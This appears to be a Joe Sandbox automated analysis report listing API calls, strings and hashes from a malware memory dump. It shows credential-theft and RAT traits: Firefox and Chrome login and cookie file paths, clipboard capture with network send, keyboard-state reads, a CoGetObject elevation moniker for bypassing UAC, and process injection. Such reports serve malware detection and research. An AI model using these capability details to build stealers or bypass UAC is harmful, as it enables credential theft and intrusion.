                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$CloseFile$FirstNext
                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                        • API String ID: 1164774033-3681987949
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • OpenClipboard.USER32 ref: 004168C2
                                                        • EmptyClipboard.USER32 ref: 004168D0
                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                        • GlobalLock.KERNEL32 ref: 004168F9
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                        • SetClipboardData.USER32 ref: 00416938
                                                        • CloseClipboard.USER32 ref: 00416955
                                                        • OpenClipboard.USER32 ref: 0041695C
                                                        • GetClipboardData.USER32 ref: 0041696C
                                                        • GlobalLock.KERNEL32 ref: 00416975
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                        • CloseClipboard.USER32 ref: 00416984
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                        • String ID: !D@
                                                        • API String ID: 3520204547-604454484
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                        • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                        • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                        • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$Close$File$FirstNext
                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                        • API String ID: 3527384056-432212279
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F563
                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F66E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                        • API String ID: 3756808967-1743721670
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0$1$2$3$4$5$6$7$VG
                                                        • API String ID: 0-1861860590
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00407521
                                                        • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Object_wcslen
                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                        • API String ID: 240030777-3166923314
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                        • GetLastError.KERNEL32 ref: 0041A7BB
                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                        • String ID:
                                                        • API String ID: 3587775597-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                        • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                        • String ID: lJD$lJD$lJD
                                                        • API String ID: 745075371-479184356
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                        • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                        • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$CloseFile$FirstNext
                                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                        • API String ID: 1164774033-405221262
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                        • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                        • String ID:
                                                        • API String ID: 2341273852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Find$CreateFirstNext
                                                        • String ID: 8SG$PXG$PXG$NG$PG
                                                        • API String ID: 341183262-3812160132
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                        • String ID:
                                                        • API String ID: 1888522110-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
                                                        • RegCloseKey.ADVAPI32(?), ref: 004140A9
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                        • API String ID: 2127411465-314212984
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _free.LIBCMT ref: 00449212
                                                        • _free.LIBCMT ref: 00449236
                                                        • _free.LIBCMT ref: 004493BD
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                        • _free.LIBCMT ref: 00449589
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                        • String ID:
                                                        • API String ID: 314583886-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                          • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                          • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                          • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                          • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                        • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                        • String ID: !D@$PowrProf.dll$SetSuspendState
                                                        • API String ID: 1589313981-2876530381
                                                        • Opcode ID: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                                                        • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                        • Opcode Fuzzy Hash: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                                                        • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                        • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID: ACP$OCP$['E
                                                        • API String ID: 2299586839-2532616801
                                                        • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                        • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                        • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                        • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                                        • GetLastError.KERNEL32 ref: 0040BA58
                                                        Strings
                                                        • [Chrome StoredLogins not found], xrefs: 0040BA72
                                                        • UserProfile, xrefs: 0040BA1E
                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteErrorFileLast
                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                        • API String ID: 2018770650-1062637481
                                                        • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                                        • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                                        • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                                        • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                        • GetLastError.KERNEL32 ref: 0041799D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                        • String ID: SeShutdownPrivilege
                                                        • API String ID: 3534403312-3733053543
                                                        • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                        • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                        • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                        • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00409258
                                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                        • FindClose.KERNEL32(00000000), ref: 004093C1
                                                          • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                          • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                          • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                        • FindClose.KERNEL32(00000000), ref: 004095B9
                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                        • String ID:
                                                        • API String ID: 1824512719-0
                                                        • Opcode ID: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                                                        • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                        • Opcode Fuzzy Hash: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                                                        • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                        • String ID:
                                                        • API String ID: 276877138-0
                                                        • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                        • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                        • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                        • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindResourceA.KERNEL32 ref: 0041B4B9
                                                        • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                        • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                        • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Resource$FindLoadLockSizeof
                                                        • String ID: SETTINGS
                                                        • API String ID: 3473537107-594951305
                                                        • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                        • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                        • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                        • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0040966A
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                        • String ID:
                                                        • API String ID: 1157919129-0
                                                        • Opcode ID: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                                                        • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                        • Opcode Fuzzy Hash: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                                                        • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00408811
                                                        • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                        • String ID:
                                                        • API String ID: 1771804793-0
                                                        • Opcode ID: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                                        • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                                        • Opcode Fuzzy Hash: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                                        • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFind$FirstNextsend
                                                        • String ID: XPG$XPG
                                                        • API String ID: 4113138495-1962359302
                                                        • Opcode ID: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
                                                        • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                                        • Opcode Fuzzy Hash: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
                                                        • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
